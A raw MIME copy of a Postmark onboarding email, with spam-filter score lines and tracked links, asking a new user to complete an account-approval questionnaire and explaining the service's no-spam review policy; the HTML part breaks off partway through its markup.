SPF_HELO_PASS SPF: HELO matches SPF record -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature 0.0 HTML_MESSAGE BODY: HTML included in message 0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to background X-Spam-Flag: NO --_=_swift-125849113966f8016dc6a6b3.80717975_=_ Content-Type: text/plain; charset=utf-8 ... and start sending emails to others. It will only take a minute. Having trouble viewing this email? Read it online https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFyay5hY3RpdmVob3N0ZWQuY29tJTJGcF92LnBocCUzRmwlM0QzJTI2YyUzRDU3JTI2bSUzRDkwJTI2cyUzRDgzZjNkMmY4YzJlMWZlOWE0ZmI4OGUzNGU1OWY4YzA4&sig=GwqE2KuZrSjJbqv4uBpFX5zLKTrqUhzGFLt7tKwdTak5&iat=1727529326&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=ZXxUqEYF%2BZ91GhfTCVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6Ctv49oV9LxEqNBZeFhBgdM8zSH&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=57A90A3A244 https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZhY2NvdW50LnBvc3RtYXJrYXBwLmNvbSUyRmFjY291bnRfYXBwcm92YWwlMkZhcHBseSUzRnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMg==&sig=2vbrPUsjkvpoL26nzGvecAauZpUf1oFEnR2wsB3e6YML&iat=1727529326&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=ZXxUqEYF%2BZ91GhfTCVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6Ctv49oV9LxEqNBZeFhBgdM8zSH&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=57A90A3A257 **Hi Friend,** Are you ready to send to other recipients? Please answer a few quick questions about your organization and your email needs so we can approve your account for external sending. Get your account approved → https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZhY2NvdW50LnBvc3RtYXJrYXBwLmNvbSUyRmFjY291bnRfYXBwcm92YWwlMkZhcHBseSUzRnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMg==&sig=2vbrPUsjkvpoL26nzGvecAauZpUf1oFEnR2wsB3e6YML&iat=1727529326&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=ZXxUqEYF%2BZ91GhfTCVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6Ctv49oV9LxEqNBZeFhBgdM8zSH&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=57A90A3A257 **Why do I have to request approval?** One thing you should know about Postmark is that we take email delivery and our sending reputation seriously. **Really** seriously. One reason why Postmark's delivery rates are better than what you see with other providers is that we have a rigorous no-spam policy. We've got lots of clever systems in place to catch bad actors, and one of the most effective ones is a human review of each new Postmark customer. We know filling out questionnaires isn't **fun,**but this one is brief-and we'll review your request quickly and get you sending right away. Learn more about Postmark's approval process. https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZzdXBwb3J0JTJGYXJ0aWNsZSUyRjEwODQtaG93LWRvZXMtdGhlLWFjY291bnQtYXBwcm92YWwtcHJvY2Vzcy13b3JrJTNGdXRtX3NvdXJjZSUzRGFjdGl2ZWhvc3RlZCUyNnV0bV9tZWRpdW0lM0RlbWFpbCUyNnV0bV9jYW1wYWlnbiUzRHBtXzIwMjMwN19vbmJvYXJkaW5nLXYxX2Uy&sig=HpbnMdVV3L8EPnPZa3zv2a1AB67JwdG4kBrSG1VMXgRF&iat=1727529326&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=ZXxUqEYF%2BZ91GhfTCVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6Ctv49oV9LxEqNBZeFhBgdM8zSH&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=57A90A3A258 If you have any questions, just reply to this email. We're always here to help! Learn more about Postmark's stellar email delivery We never ever mix transactional and promotional emails To protect the delivery of your transactional emails, it's crucial to separate them from your bulk or promotional emails. With Postmark's Message Streams, that's a piece of cake. Learn more. https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZtZXNzYWdlLXN0cmVhbXMlM0Z1dG1fc291cmNlJTNEYWN0aXZlaG9zdGVkJTI2dXRtX21lZGl1bSUzRGVtYWlsJTI2dXRtX2NhbXBhaWduJTNEcG1fMjAyMzA3X29uYm9hcmRpbmctdjFfZTI=&sig=Gr2aeTtXK7gY1gLGnjyPCJL4AyYan4EqY3YZjwmcvaMT&iat=1727529326&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=ZXxUqEYF%2BZ91GhfTCVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6Ctv49oV9LxEqNBZeFhBgdM8zSH&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=57A90A3A259 **Transactional time to inbox** We don't just claim great delivery. We publicly share our email delivery metrics for transactional email. View our time to inbox here https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZ0dGkucG9zdG1hcmthcHAuY29tJTNGdXRtX3NvdXJjZSUzRGFjdGl2ZWhvc3RlZCUyNnV0bV9tZWRpdW0lM0RlbWFpbCUyNnV0bV9jYW1wYWlnbiUzRHBtXzIwMjMwN19vbmJvYXJkaW5nLXYxX2Uy&sig=LPsZqfDojxgmQUVk1Fo645hGFJhBi4q249ftDbprMJ4&iat=1727529326&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=ZXxUqEYF%2BZ91GhfTCVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6Ctv49oV9LxEqNBZeFhBgdM8zSH&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=57A90A3A262. Postmark, 1 North Dearborn St, 5th floor, Chicago, IL 60602, United States Read this online https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFyay5hY3RpdmVob3N0ZWQuY29tJTJGcF92LnBocCUzRmwlM0QzJTI2YyUzRDU3JTI2bSUzRDkwJTI2cyUzRDgzZjNkMmY4YzJlMWZlOWE0ZmI4OGUzNGU1OWY4YzA4&sig=GwqE2KuZrSjJbqv4uBpFX5zLKTrqUhzGFLt7tKwdTak5&iat=1727529326&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=ZXxUqEYF%2BZ91GhfTCVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6Ctv49oV9LxEqNBZeFhBgdM8zSH&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=57A90A3A244 - Unsubscribe https://postmark.activehosted.com/proc.php?nl=3&c=57&m=90&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&act=unsub&runid=606393 --_=_swift-125849113966f8016dc6a6b3.80717975_=_ Content-Type: text/html; charset=utf-8 Content-Transfer-Encoding: quoted-printable <!DOCTYPE html><html>=0A<head><meta http-equiv=3D"Content-Type" content=3D"= text/html; charset=3Dutf-8"><meta name=3D"viewport" content=3D"width=3Ddevi= ce-width, minimal-ui, initial-scale=3D1.0, maximum-scale=3D1.0, user-scalab= le=3D0;"><meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"><meta n= ame=3D"format-detection" content=3D"telephone=3Dno, date=3Dno, email=3Dno, = address=3Dno"><meta name=3D"x-apple-disable-message-reformatting">=0A<!--[i= f (mso 16)]><style type=3D"text/css"> a { text-decoration: none; } </style>= <![endif]--> =0A<!--[if gte mso 9]><style> sup { font-size: 100% !important= ; } </style><![endif]--> =0A<!--[if gte mso 9]><xml><o:OfficeDocumentSettin= gs><o:AllowPNG></o:AllowPNG><o:PixelsPerInch>96</o:PixelsPerInch></o:Office= DocumentSettings></xml><![endif]--> =0A<!--[if gte mso 9]><style>sup { font= -size: 100% !important; }</style><![endif]--> =0A<!--[if !mso]><!-- --><lin= k href=3D"https://fonts.googleapis.com/css?family=3DRoboto:400,400i,700,700= i" rel=3D"stylesheet"> =0A<!--<![endif]--><style type=3D"text/css">#outlook= a { padding:0;}.es-button { mso-style-priority:100!important; text-decorat= ion:none!important;}a[x-apple-data-detectors] { color:inherit!important; te= xt-decoration:none!important; font-size:inherit!important; font-family:inhe= rit!important; font-weight:inherit!important; line-height:inherit!important= ;}.es-desk-hidden { display:none; float:left; overflow:hidden; width:0; max= -height:0; line-height:0; mso-hide:all;}=0A@media only screen and (max-widt= h:600px) {p, ul li, ol li, a { line-height:150%!important } h1, h2, h3, h1 = a, h2 a, h3 a { line-height:120% } h1 { font-size:22px!important; text-alig= n:left!important } h2 { font-size:20px!important; text-align:left!important= } h3 { font-size:18px!important; text-align:left!important } .es-header-bo= dy h1 a, .es-content-body h1 a, .es-footer-body h1 a { font-size:22px!impor= tant; text-align:left!important } .es-header-body h2 a, .es-content-body h2= a, .es-footer-body h2 a { font-size:20px!important; text-align:left!import= ant } .es-header-body h3 a, .es-content-body h3 a, .es-footer-body h3 a { f= ont-size:18px!important; text-align:left!important } .es-menu td a { font-s= ize:13px!important } .es-header-body p, .es-header-body ul li, .es-header-b= ody ol li, .es-header-body a { font-size:12px!important }=0A .es-content-bo= dy p, .es-content-body ul li, .es-content-body ol li, .es-content-body a { = font-size:16px!important } .es-footer-body p, .es-footer-body ul li, .es-fo= oter-body ol li, .es-footer-body a { font-size:12px!important } .es-infoblo= ck p, .es-infoblock ul li, .es-infoblock ol li, .es-infoblock a { font-size= :12px!important } *[class=3D"gmail-fix"] { display:none!important } .es-m-t= xt-c, .es-m-txt-c h1, .es-m-txt-c h2, .es-m-txt-c h3 { text-align:center!im= portant } .es-m-txt-r, .es-m-txt-r h1, .es-m-txt-r h2, .es-m-txt-r h3 { tex= t-align:right!important } .es-m-txt-l, .es-m-txt-l h1, .es-m-txt-l h2, .es-= m-txt-l h3 { text-align:left!important } .es-m-txt-r img, .es-m-txt-c img, = .es-m-txt-l img { display:inline!important } .es-button-border { display:in= line-block!important } a.es-button, button.es-button { font-size:14px!impor= tant; display:inline-block!important } .es-adaptive table, .es-left, .es-ri= ght { width:100%!important }=0A .ac-footer, .es-content table, .es-header t= able, .es-footer table, .es-content, .es-footer, .es-header { width:100%!im= portant; max-width:600px!important } .ac-footer td, .ac-footer p, .es-adapt= -td { display:block!important; width:100%!important } .adapt-img { width:10= 0%!important; height:auto!important } .es-m-p0 { padding:0px!important } .e= s-m-p0r { padding-right:0px!important } .es-m-p0l { padding-left:0px!import= ant } .es-m-p0t { padding-top:0px!important } .es-m-p0b { padding-bottom:0!= important } .es-m-p20b { padding-bottom:20px!important } .es-mobile-hidden,= .es-hidden { display:none!important } tr.es-desk-hidden, td.es-desk-hidden= , table.es-desk-hidden { width:auto!important; overflow:visible!important; = float:none!important; max-height:inherit!important; line-height:inherit!imp= ortant } tr.es-desk-hidden { display:table-row!important } table.es-desk-hi= dden { display:table!important }=0A td.es-desk-menu-hidden { display:table-= cell!important } .es-menu td { width:1%!important } table.es-table-not-adap= t, .esd-block-html table { width:auto!important } table.es-social { display= :inline-block!important } table.es-social td { display:inline-block!importa= nt } .es-desk-hidden { display:table-row!important; width:auto!important; o= verflow:visible!important; max-height:inherit!important } }@media screen an= d (max-width:384px) {.mail-message-content { width:414px!important } }</sty= le>=0A </head>=0A <body class=3D"es-wrapper-color" lang=3D"und" style=3D"fo= nt-family:georgia, times, 'times new roman', serif;width:100%;-webkit-text-= size-adjust:100%;-ms-text-size-adjust:100%;padding:0;Margin:0;background-co= lor:#F5F3EC">=09=09<div style=3D"display: none !important; padding: 0; heig= ht: 1px; font-size: 1px; background-color: inherit !important; opacity: 0; = color: transparent; mso-line-height-rule: exactly; line-height:1px; mso-hid= e:all;">=0A=09=09=09=E2=80=A6 and start sending emails to others. It will o= nly take a minute.=0A=09=09=09<div style=3D"display: none; max-height: 0px;= overflow: hidden;">=0A=09=09=09=09 =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C=0A=09=09=09</div>=0A= =0A=09=09</div>=0A<table class=3D"es-wrapper" width=3D"100%" cellspacing=3D= "0" cellpadding=3D"0" role=3D"none" style=3D"mso-table-lspace:0pt;mso-table= -rspace:0pt;border-collapse:collapse;border-spacing:0px;padding:0;Margin:0;= width:100%;height:100%;background-repeat:repeat;background-position:center = top;background-color:#F5F3EC"><tr><td valign=3D"top" style=3D"padding:0;Mar= gin:0"><table cellpadding=3D"0" cellspacing=3D"0" class=3D"es-header" align= =3D"center" role=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0p= t;border-collapse:collapse;border-spacing:0px;table-layout:fixed !important= ;width:100%;background-color:transparent;background-repeat:repeat;backgroun= d-position:center top"><tr><td align=3D"center" style=3D"padding:0;Margin:0= "><table class=3D"es-header-body" align=3D"center" cellpadding=3D"0" cellsp= acing=3D"0" bgcolor=3D"#FFFFFF" role=3D"none" style=3D"mso-table-lspace:0pt= ;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px;backgroun= d-color:transparent;width:600px"><tr><td align=3D"left"=0Astyle=3D"padding:= 0;Margin:0"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" role= =3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collaps= e:collapse;border-spacing:0px"><tr><td align=3D"center" valign=3D"top" styl= e=3D"padding:0;Margin:0;width:600px"><table cellpadding=3D"0" cellspacing= =3D"0" width=3D"100%" role=3D"presentation" style=3D"mso-table-lspace:0pt;m= so-table-rspace:0pt;border-collapse:collapse;border-spacing:0px"><tr><td al= ign=3D"center" height=3D"15" bgcolor=3D"#f5f3ec" style=3D"padding:0;Margin:= 0"></td>=0A=0A </tr>=0A<tr><td align=3D"center" bgcolor=3D"#f5f3ec" style= =3D"padding:0;Margin:0"><p style=3D"Margin:0;-webkit-text-size-adjust:none;= -ms-text-size-adjust:none;mso-line-height-rule:exactly;font-family:georgia,= times, 'times new roman', serif;line-height:18px;color:#a9a696;font-size:1= 2px">Having trouble viewing this email?=C2=A0<a target=3D"_blank" href=3D"h= ttps://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElM= kYlMkZwb3N0bWFyay5hY3RpdmVob3N0ZWQuY29tJTJGcF92LnBocCUzRmwlM0QzJTI2YyUzRDU3= JTI2bSUzRDkwJTI2cyUzRDgzZjNkMmY4YzJlMWZlOWE0ZmI4OGUzNGU1OWY4YzA4&sig=3DGwqE= 2KuZrSjJbqv4uBpFX5zLKTrqUhzGFLt7tKwdTak5&iat=3D1727529326&a=3D%7C%7C4775866= 17%7C%7C&account=3Dpostmark%2Eactivehosted%2Ecom&email=3DZXxUqEYF%2BZ91GhfT= CVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6= Ctv49oV9LxEqNBZeFhBgdM8zSH&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D57A90A3= A244" style=3D"-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-= line-height-rule:exactly;text-decoration:underline;color:#a9a696;font-size:= 12px">Read it online</a></p>=0A</td>=0A</tr>=0A<tr><td align=3D"center" hei= ght=3D"15" bgcolor=3D"#f5f3ec" style=3D"padding:0;Margin:0"></td>=0A</tr>= =0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>= =0A</tr>=0A</table>=0A=0A <table cellpadding=3D"0" cellspacing=3D"0" class= =3D"es-content" align=3D"center" role=3D"none" style=3D"mso-table-lspace:0p= t;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px;table-la= yout:fixed !important;width:100%"><tr><td align=3D"center" style=3D"padding= :0;Margin:0"><table bgcolor=3D"#ffffff" class=3D"es-content-body" align=3D"= center" cellpadding=3D"0" cellspacing=3D"0" role=3D"none" style=3D"mso-tabl= e-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0= px;background-color:#FFFFFF;width:600px"><tr><td align=3D"left" style=3D"pa= dding:0;Margin:0;padding-left:30px;padding-right:30px"><table cellpadding= =3D"0" cellspacing=3D"0" width=3D"100%" role=3D"none" style=3D"mso-table-ls= pace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px">= <tr><td align=3D"center" valign=3D"top" style=3D"padding:0;Margin:0;width:5= 40px"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" role=3D"pre= sentation"=0Astyle=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-coll= apse:collapse;border-spacing:0px"><tr><td align=3D"center" height=3D"30" st= yle=3D"padding:0;Margin:0"></td>=0A=0A </tr>=0A=0A <tr><td align=3D"center"= style=3D"padding:0;Margin:0;font-size:0px"><a target=3D"_blank" href=3D"ht= tps://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElMk= YlMkZhY2NvdW50LnBvc3RtYXJrYXBwLmNvbSUyRmFjY291bnRfYXBwcm92YWwlMkZhcHBseSUzR= nV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2Ft= cGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMg=3D=3D&sig=3D2vbrPUsjkvpoL26n= zGvecAauZpUf1oFEnR2wsB3e6YML&iat=3D1727529326&a=3D%7C%7C477586617%7C%7C&acc= ount=3Dpostmark%2Eactivehosted%2Ecom&email=3DZXxUqEYF%2BZ91GhfTCVXXqRztC3f9= CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6Ctv49oV9LxEq= NBZeFhBgdM8zSH&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D57A90A3A257" style= =3D"-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height= -rule:exactly;text-decoration:underline;color:#0070CC;font-size:16px"><img = src=3D"https://content.app-us1.com/cdn-cgi/image/dpr=3D2,fit=3Dscale-down,f= ormat=3Dauto,onerror=3Dredirect,width=3D650/MnbAp/2022/08/30/4f14024d-dd57-= 4b66-a606-bda1d1f9d21f.png" alt style=3D"display:block;border:0;outline:non= e;text-decoration:none;-ms-interpolation-mode:bicubic" data-cf-ir-is-resize= d=3D"true" width=3D"150"></a>=0A</td>=0A</tr>=0A<tr><td align=3D"center" he= ight=3D"30" style=3D"padding:0;Margin:0"></td>=0A</tr>=0A</table>=0A</td>= =0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>= =0A=0A <table cellpadding=3D"0" cellspacing=3D"0" class=3D"es-content" alig= n=3D"center" role=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0= pt;border-collapse:collapse;border-spacing:0px;table-layout:fixed !importan= t;width:100%"><tr><td align=3D"center" style=3D"padding:0;Margin:0"><table = class=3D"es-content-body" align=3D"center" cellpadding=3D"0" cellspacing=3D= "0" bgcolor=3D"#ffffff" role=3D"none" style=3D"mso-table-lspace:0pt;mso-tab= le-rspace:0pt;border-collapse:collapse;border-spacing:0px;background-color:= #FFFFFF;width:600px"><tr><td align=3D"left" style=3D"padding:0;Margin:0"><t= able cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" role=3D"none" style= =3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;bord= er-spacing:0px"><tr><td align=3D"center" valign=3D"top" style=3D"padding:0;= Margin:0;width:600px"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"1= 00%" role=3D"presentation" style=3D"mso-table-lspace:0pt;mso-table-rspace:0= pt;border-collapse:collapse;border-spacing:0px"><tr><td align=3D"center"=0A= height=3D"15" style=3D"padding:0;Margin:0"></td>=0A=0A </tr>=0A<tr><td alig= n=3D"left" bgcolor=3D"#ffffff" style=3D"padding:0;Margin:0;padding-left:30p= x;padding-right:30px"><h1 style=3D"Margin:0;line-height:26px;mso-line-heigh= t-rule:exactly;font-family:georgia, times, 'times new roman', serif;font-si= ze:22px;font-style:normal;font-weight:normal;color:#333333;text-align:left"= >Hi Friend,</h1><p style=3D"Margin:0;-webkit-text-size-adjust:none;-ms-text= -size-adjust:none;mso-line-height-rule:exactly;font-family:georgia, times, = 'times new roman', serif;line-height:24px;color:#353942;font-size:16px"><br= ></p>=0A<p style=3D"Margin:0;-webkit-text-size-adjust:none;-ms-text-size-ad= just:none;mso-line-height-rule:exactly;font-family:georgia, times, 'times n= ew roman', serif;line-height:24px;color:#353942;font-size:16px">Are you rea= dy to send to other recipients? Please answer a few quick questions about y= our organization and your email needs so we can approve your account for ex= ternal sending.</p>=0A</td>=0A</tr>=0A=0A <tr><td align=3D"center" height= =3D"20" style=3D"padding:0;Margin:0"></td>=0A</tr>=0A=0A <tr><td align=3D"l= eft" style=3D"padding:0;Margin:0;padding-left:30px"> =0A<!--[if mso]><a hre= f=3D"https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=3DaHR0cHM= lM0ElMkYlMkZhY2NvdW50LnBvc3RtYXJrYXBwLmNvbSUyRmFjY291bnRfYXBwcm92YWwlMkZhcH= BseSUzRnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1d= G1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMg=3D=3D&sig=3D2vbrPUsjk= vpoL26nzGvecAauZpUf1oFEnR2wsB3e6YML&iat=3D1727529326&a=3D%7C%7C477586617%7C= %7C&account=3Dpostmark%2Eactivehosted%2Ecom&email=3DZXxUqEYF%2BZ91GhfTCVXXq= RztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6Ctv49= oV9LxEqNBZeFhBgdM8zSH&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D57A90A3A257"= target=3D"_blank" hidden>=0A=09<v:roundrect xmlns:v=3D"urn:schemas-microso= ft-com:vml" xmlns:w=3D"urn:schemas-microsoft-com:office:word" esdevVmlButto= n href=3D"https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=3DaH= R0cHMlM0ElMkYlMkZhY2NvdW50LnBvc3RtYXJrYXBwLmNvbSUyRmFjY291bnRfYXBwcm92YWwlM= kZhcHBseSUzRnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwl= MjZ1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMg=3D=3D&sig=3D2vbr= PUsjkvpoL26nzGvecAauZpUf1oFEnR2wsB3e6YML&iat=3D1727529326&a=3D%7C%7C4775866= 17%7C%7C&account=3Dpostmark%2Eactivehosted%2Ecom&email=3DZXxUqEYF%2BZ91GhfT= CVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6= Ctv49oV9LxEqNBZeFhBgdM8zSH&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D57A90A3= A257" =0A style=3D"height:36px; v-text-anchor:middle; width:= 215px" arcsize=3D"8%" stroke=3D"f" fillcolor=3D"#007dcc">=0A=09=09<w:ancho= rlock></w:anchorlock>=0A=09=09<center style=3D'color:#ffffff; font-family:g= eorgia, times, "times new roman", serif; font-size:12px; font-weight:400; l= ine-height:12px; mso-text-raise:1px'>Get your account approved →</cen= ter>=0A=09</v:roundrect></a>=0A<![endif]--> =0A<!--[if !mso]><!-- --><span = class=3D"msohide es-button-border" style=3D"border-style:solid;border-color= :#007DCC;background:#007DCC;border-width:0px;display:inline-block;border-ra= dius:3px;width:auto;mso-hide:all"><a href=3D"https://postmark.lt.emlnk1.com= /Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZhY2NvdW50LnBvc3RtYXJrYX= BwLmNvbSUyRmFjY291bnRfYXBwcm92YWwlMkZhcHBseSUzRnV0bV9zb3VyY2UlM0RhY3RpdmVob= 3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25i= b2FyZGluZy12MV9lMg=3D=3D&sig=3D2vbrPUsjkvpoL26nzGvecAauZpUf1oFEnR2wsB3e6YML= &iat=3D1727529326&a=3D%7C%7C477586617%7C%7C&account=3Dpostmark%2Eactivehost= ed%2Ecom&email=3DZXxUqEYF%2BZ91GhfTCVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%= 2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6Ctv49oV9LxEqNBZeFhBgdM8zSH&s=3D83f3d2f8c= 2e1fe9a4fb88e34e59f8c08&i=3D57A90A3A257" class=3D"es-button" target=3D"_bla= nk" style=3D"mso-style-priority:100 !important;text-decoration:none;-webkit= -text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exact= ly;color:#FFFFFF;font-size:14px;padding:10px 15px 10px 15px;display:inline-= block;background:#007DCC;border-radius:3px;font-family:georgia, times, 'tim= es new roman',=0Aserif;font-weight:normal;font-style:normal;line-height:17p= x;width:auto;text-align:center;mso-padding-alt:0;mso-border-alt:10px solid = #007DCC">Get your account approved =E2=86=92</a>=0A</span> =0A<!--<![endif]= --></td>=0A</tr>=0A<tr><td align=3D"center" height=3D"30" style=3D"padding:= 0;Margin:0"></td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A<= /tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A=0A <table cellpadding=3D"0" c= ellspacing=3D"0" class=3D"es-content" align=3D"center" role=3D"none" style= =3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;bord= er-spacing:0px;table-layout:fixed !important;width:100%"><tr><td align=3D"c= enter" style=3D"padding:0;Margin:0"><table class=3D"es-content-body" align= =3D"center" cellpadding=3D"0" cellspacing=3D"0" bgcolor=3D"#ffffff" role=3D= "none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:c= ollapse;border-spacing:0px;background-color:#FFFFFF;width:600px"><tr><td al= ign=3D"left" 